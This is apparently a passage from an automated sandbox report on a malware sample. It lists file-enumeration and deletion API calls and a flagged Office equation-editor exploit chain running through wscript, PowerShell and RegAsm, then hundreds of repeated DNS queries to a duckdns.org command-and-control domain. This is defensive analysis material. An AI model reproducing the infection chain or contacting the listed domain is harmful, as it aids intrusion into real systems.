                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Suspicious execution chain found
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global trafficDNS query: name: ia601706.us.archive.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficDNS query: name: camzeroconnect.duckdns.org
